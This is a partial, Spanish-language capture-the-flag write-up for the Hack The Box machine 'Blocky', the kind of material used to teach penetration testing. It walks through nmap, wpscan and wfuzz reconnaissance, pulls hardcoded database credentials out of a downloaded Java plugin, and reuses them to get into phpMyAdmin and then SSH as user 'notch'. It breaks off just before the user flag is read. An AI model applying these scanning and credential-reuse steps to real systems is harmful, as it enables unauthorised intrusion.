┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# ping -c 1 10.10.10.37
PING 10.10.10.37 (10.10.10.37) 56(84) bytes of data.
64 bytes from 10.10.10.37: icmp_seq=1 ttl=63 time=173 ms
--- 10.10.10.37 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 172.733/172.733/172.733/0.000 ms
Podemos notar que se trata de una maquina Linux, debido al TTL:
TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)
1.2 Nmap
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.37 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 20:02 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:02
Completed Parallel DNS resolution of 1 host. at 20:02, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:02
Scanning 10.10.10.37 [65535 ports]
Discovered open port 80/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 25565/tcp on 10.10.10.37
Completed SYN Stealth Scan at 20:02, 26.49s elapsed (65535 total ports)
Initiating Service scan at 20:02
Scanning 4 services on 10.10.10.37
Completed Service scan at 20:02, 6.46s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.37.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:03, 5.22s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 1.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-04 20:02:25 -03 for 40s
Not shown: 65530 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 ProFTPD 1.3.5a
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8=
| 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
25565/tcp open minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds
Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.008KB)
Se ven puertos como el 21(ProFTPD 1.3.5a) correspondiente a un servidor FTP para transferencia de archivos, el puerto 22(OpenSSH 7.2p2) correspondiente a un servidor SSH para control remoto vía consola, el puerto 80(Apache httpd 2.4.18) correspondiente a un servidor web y por ultimo y no menos interesante, el puerto 25565(Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)) correspondiente a un servidor de Minecraft para la versión 1.11.2
1.3 whatweb
Antes de realizar el escaneo con whatweb para ver las tecnologías webs utilizadas, vamos a hacer que el dominio "http://blocky.htb/" apunte a la IP de la maquina de Hack The Box(10.10.10.37), para eso vamos a modificar el archivo "/etc/hosts":
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nvim /etc/hosts
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 t0mz
# HACK THE BOX
10.10.10.37 blocky.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─#
Vamos a ingresar al sitio web alojado en el puerto 80 mediante Firefox con el dominio correspondiente:
Y ahora si vamos a realizar el escaneo de whatweb al dominio "http://blocky.htb/":
Al ser una pagina web hecha con el CMS de WordPress en su versión 4.8, vamos a utilizar la herramienta para escanear WordPress llamada "wpscan", utilizamos el siguiente comando:
wpscan --url http://blocky.htb/ -e p --plugins-detection aggressive
❯ wpscan --url http://blocky.htb/ -e p --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Mar 4 23:05:14 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blocky.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://blocky.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2024-11-12T00:00:00.000Z
| Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.8
| Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:54 <====================================================================================================> (1500 / 1500) 100.00% Time: 00:00:54
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://blocky.htb/wp-content/plugins/akismet/
| Last Updated: 2025-02-14T18:49:00.000Z
| Readme: http://blocky.htb/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/, status: 200
|
| Version: 3.3.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Mar 4 23:06:23 2025
[+] Requests Done: 1553
[+] Cached Requests: 7
[+] Data Sent: 411.154 KB
[+] Data Received: 22.418 MB
[+] Memory used: 253.656 MB
[+] Elapsed time: 00:01:08
Vemos un plugin llamado "akismet" en su versión 3.3.2
❯ wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blocky.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blocky.htb/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000014: 200 313 L 3592 W 52224 Ch "http://blocky.htb/"
000000012: 200 313 L 3592 W 52224 Ch "# on atleast 2 different hosts"
000000003: 200 313 L 3592 W 52224 Ch "# Copyright 2007 James Fisher"
000000007: 200 313 L 3592 W 52224 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000013: 200 313 L 3592 W 52224 Ch "#"
000000011: 200 313 L 3592 W 52224 Ch "# Priority ordered case sensative list, where entries were found"
000000241: 301 9 L 28 W 313 Ch "wp-content"
000000009: 200 313 L 3592 W 52224 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000010: 200 313 L 3592 W 52224 Ch "#"
000000006: 200 313 L 3592 W 52224 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 313 L 3592 W 52224 Ch "#"
000000005: 200 313 L 3592 W 52224 Ch "# This work is licensed under the Creative Commons"
000000008: 200 313 L 3592 W 52224 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000004: 200 313 L 3592 W 52224 Ch "#"
000000001: 200 313 L 3592 W 52224 Ch "# directory-list-2.3-medium.txt"
000000519: 301 9 L 28 W 310 Ch "plugins"
000000786: 301 9 L 28 W 314 Ch "wp-includes"
000001073: 301 9 L 28 W 313 Ch "javascript"
000000190: 301 9 L 28 W 307 Ch "wiki"
000010825: 301 9 L 28 W 313 Ch "phpmyadmin"
000007180: 301 9 L 28 W 311 Ch "wp-admin"
000045240: 200 313 L 3592 W 52224 Ch "http://blocky.htb/"
000095524: 403 11 L 32 W 298 Ch "server-status"
Total time: 349.7403
Processed Requests: 220560
Filtered Requests: 220537
Requests/sec.: 630.6392
Vemos directorios interesantes, como el de "plugins" o el "phpmyadmin" que revisando el código fuente, es la versión 4.5.4
2- Explotación
2.1 BlockyCore.jar
Vamos a irnos a la URL "http://blocky.htb/plugins", directorio encontrado donde realizamos el fuzzing del sitio web:
Vemos 2 plugins, concretamente el que nos interesa es el "BlockyCore.jar", asi que vamos a bajárnoslo dandole click:
❯ ls -la
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar 4 23:26:15 2025 .
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar 4 22:46:58 2025 ..
.rwxrwxrwx t0mz t0mz 883 B Tue Mar 4 23:25:31 2025 BlockyCore.jar
.rw-rw-r-- t0mz t0mz 2.1 KB Tue Mar 4 22:48:50 2025 escaneo.txt
.rw-rw-r-- t0mz t0mz 263 B Tue Mar 4 22:55:33 2025 ping.txt
.rw-rw-r-- t0mz t0mz 964 B Tue Mar 4 22:54:49 2025 whatweb.txt
Vamos a extraerlo con 7zip de GNU/Linux, con el comando "7z x BlockyCore.jar":
❯ 7z x BlockyCore.jar
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 883 bytes (1 KiB)
Extracting archive: BlockyCore.jar
--
Path = BlockyCore.jar
Type = zip
Physical Size = 883
Everything is Ok
Files: 2
Size: 964
Compressed: 883
❯ ls
com META-INF BlockyCore.jar
Vamos a irnos al directorio "com" de lo extraido anteriomente y listamos los directorios:
❯ cd com
❯ ls
myfirstplugin
Vamos al directorio "myfirstplugin":
❯ cd myfirstplugin
❯ ls
BlockyCore.class
Vamos a hacerle un "strings" al archivo "BlockyCore.class", ya que no podemos hacerle un "cat" debido a que es una clase de Java en POO:
❯ strings BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java
Parecen verse unas credenciales por sentido comun:
root
8YsqfCTnvxAUeduzjNSXe22
Si recordamos, teníamos el directorio de "phpmyadmin", que es una aplicación web hecha en PHP para gestión de bases de datos, vamos a intentar ingresar estas credenciales dentro del login de "phpmyadmin", "http://blocky.htb/phpmyadmin":
Nos ingresa correctamente:
2.2 Intrusión por SSH
Ya tenemos una contraseña que podríamos utilizar para logearnos mediante SSH, ahora lo que nos faltaría es obtener algún usuario del sistema, para eso revisaremos las base de datos de WordPress que esta dentro de "phpmyadmin", concretamente en la tabla de "wp_users":
Vemos un usuario llamado "notch", vamos a logearnos entonces con ese usuario, de tal manera que las credenciales quedarian de la siguiente forma:
Uusuario: notch
Password: 8YsqfCTnvxAUeduzjNSXe22
Nos logeamos vía SSH:
❯ ssh notch@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ED25519) to the list of known hosts.
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Fri Jul 8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
notch@Blocky:~$
2.3 Obtención de la flag user
La flag de user se encuentra dentro de la carpeta personal del usuario "notch", si listamos los directorios ni bien nos logeamos en SSH:
notch@Blocky:~$ ls
minecraft user.txt
notch@Blocky:~$
Esta la flag user.txt, vamos a visualizarla con cat:
